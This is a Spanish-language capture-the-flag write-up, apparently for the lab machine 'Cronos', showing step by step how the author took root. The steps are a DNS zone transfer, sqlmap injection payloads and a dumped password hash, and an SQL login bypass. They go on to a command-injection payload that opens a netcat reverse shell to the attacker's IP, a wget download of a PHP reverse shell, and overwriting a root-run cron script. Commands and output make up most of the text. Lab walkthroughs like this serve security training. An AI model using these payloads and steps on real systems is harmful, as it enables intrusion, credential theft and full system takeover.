Esta maquina estuvo interesante porque tenias que hacer muchas cosas chiquitas para lograr tu objetivo. Entre ellas agregar el host, y hackear DNS por que las herramientas normales no funcionaban.

Empezamos con un NMAP

root@Kali2:~# nmap -sC -sV 10.10.10.13
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-29 21:57 CET
Nmap scan report for 10.10.10.13
Host is up (0.034s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Hacemos un nslookup

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds
root@Kali2:~# nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
13.10.10.10.in-addr.arpa    name = ns1.cronos.htb.
> cronos.htb
Server:        10.10.10.13
Address:    10.10.10.13#53

Name:    cronos.htb
Address: 10.10.10.13

Despues podemos pedir una zone transfer de los DNS y descubrimos admin.cronos.htb (domained no servia en este caso)

; <<>> DiG 9.11.5-P4-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A    10.10.10.13
admin.cronos.htb.    604800    IN    A    10.10.10.13
ns1.cronos.htb.        604800    IN    A    10.10.10.13
www.cronos.htb.        604800    IN    A    10.10.10.13
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 24 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Oct 29 22:04:30 CET 2019
;; XFR size: 7 records (messages 1, bytes 203)

Al descubrir los host hay que agregarlos al host file en linux, se debe ver algo así

127.0.0.1    localhost
127.0.1.1    kali
10.10.10.13    cronos.htb  admin.cronos.htb

Con eso ya fucionan las paginas web.

Podemos hacer un SQLmap muy agresivo y vemos que es vulnerable a sql injection. Extraje el password hash pero no pude crackearlo. Lo que hice en vez fue admin’– – para hacer bypass y lograr accesso.

root@Kali2:~/Desktop# sqlmap --keep-alive --threads=10 --risk=3 --level=5 -r cronos
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[22:13:24] [INFO] checking if the injection point on (custom) POST parameter '#1*' is a false positive
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 612 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-8951' OR 5579=5579-- gqXx&password=a

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind (comment)
    Payload: username=a' RLIKE SLEEP(5)#&password=a

Database: admin
Table: users
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+

Una vez adentro podemos hacer post requests:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
...
Cookie: PHPSESSID=0lf9ah4h4f2ogilon01ad15va5
Upgrade-Insecure-Requests: 1
 
command=traceroute&host=8.8.8.8

Si modificamos el command a

command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+1235+>/tmp/f

Tenemos una shell

Es importante export Term=xxx 
para que quede bien la shell 
y no se porque empezar con un clear *ni idea

LinEnum nos muestra

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *    root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
www-data@cronos:/dev/shm$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 5492 Oct 30 00:27 /var/www/laravel/artisan

Artisan es modificable asi que le podemos injectar una reverse tcp shell

www-data@cronos:/dev/shm$ wget 10.10.14.4:801/php-reverse-shell.php
--2019-10-30 00:26:47--  http://10.10.14.4:801/php-reverse-shell.php
Connecting to 10.10.14.4:801... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5492 (5.4K) [application/octet-stream]
Saving to: 'php-reverse-shell.php'

php-reverse-shell.p 100%[===================>]   5.36K  --.-KB/s    in 0.1s    

2019-10-30 00:26:47 (42.0 KB/s) - 'php-reverse-shell.php' saved [5492/5492]

www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/a
app/     artisan  
www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/a
app/     artisan  
www-data@cronos:/dev/shm$ cat php-reverse-shell.php > /var/www/laravel/artisan

A partir de ahí ya la tenemos

root@Kali2:~/Desktop# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.13] 39512
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 00:28:01 up 8 min,  0 users,  load average: 0.00, 0.10, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Con eso agregamos una maquina más a nuestra cuenta 🙂